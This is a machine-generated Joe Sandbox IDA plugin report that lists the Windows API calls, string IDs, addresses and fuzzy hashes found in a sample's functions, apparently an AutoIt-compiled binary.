                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 0-2761332787
                                                                                                                                                                            • Opcode ID: 31ff441d28c5e927918bd04bcaff178bc0424bc9c98581a0806166e4fd3f8403
                                                                                                                                                                            • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                                                                                                            • Opcode Fuzzy Hash: 31ff441d28c5e927918bd04bcaff178bc0424bc9c98581a0806166e4fd3f8403
                                                                                                                                                                            • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00450944
                                                                                                                                                                            • _wcscat.LIBCMT ref: 00450955
                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                            • String ID: -----$SysListView32
                                                                                                                                                                            • API String ID: 4008455318-3975388722
                                                                                                                                                                            • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                                                                            • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                                                                                            • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                                                                            • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 00448625
                                                                                                                                                                            • CreateMenu.USER32 ref: 0044863C
                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                                                                            • IsMenu.USER32(?), ref: 004486EB
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00448742
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 176399719-4108050209
                                                                                                                                                                            • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                            • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                                                                            • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                            • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                                                                            • GetParent.USER32 ref: 004692A4
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                                                                            • GetParent.USER32 ref: 004692C7
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 2040099840-1403004172
                                                                                                                                                                            • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                            • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                                                                            • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                            • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                                                                            • GetParent.USER32 ref: 0046949E
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                                                                            • GetParent.USER32 ref: 004694C1
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 2040099840-1403004172
                                                                                                                                                                            • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                                                            • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                                                            • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                                                                                            • SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
                                                                                                                                                                            • SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                                                                                              • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3771399671-0
                                                                                                                                                                            • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                                                            • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                                                                                            • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                                                            • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3413494760-0
                                                                                                                                                                            • Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                                                                                            • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                                                                                                            • Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                                                                                            • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                            • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                                                            • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                                                                            • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                                                            • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsicoll
                                                                                                                                                                            • String ID: 0%d$DOWN$OFF
                                                                                                                                                                            • API String ID: 3832890014-468733193
                                                                                                                                                                            • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                                                            • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                                                                                                            • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                                                            • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045EB1F
                                                                                                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                                                                            Strings
                                                                                                                                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                                                                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                                            • API String ID: 43541914-1568723262
                                                                                                                                                                            • Opcode ID: 59f20d5c687eca5b8ac21bf224ed8e62dc0999386ac77495242af5446a13f09a
                                                                                                                                                                            • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                                                                            • Opcode Fuzzy Hash: 59f20d5c687eca5b8ac21bf224ed8e62dc0999386ac77495242af5446a13f09a
                                                                                                                                                                            • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                                                                            APIs
                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DecrementInterlocked$Sleep
                                                                                                                                                                            • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                                                                                                            • API String ID: 2250217261-3412429629
                                                                                                                                                                            • Opcode ID: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                                                                            • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                                                                            • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                            • API String ID: 0-1603158881
                                                                                                                                                                            • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                                                            • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                                                                            • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                                                            • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 00479D1F
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                                                                              • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                                                                              • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                                                                              • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                                                                            • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                            • API String ID: 665237470-60002521
                                                                                                                                                                            • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                            • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                                                                            • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                            • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                                                                            • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                                                            • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                                                                            • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
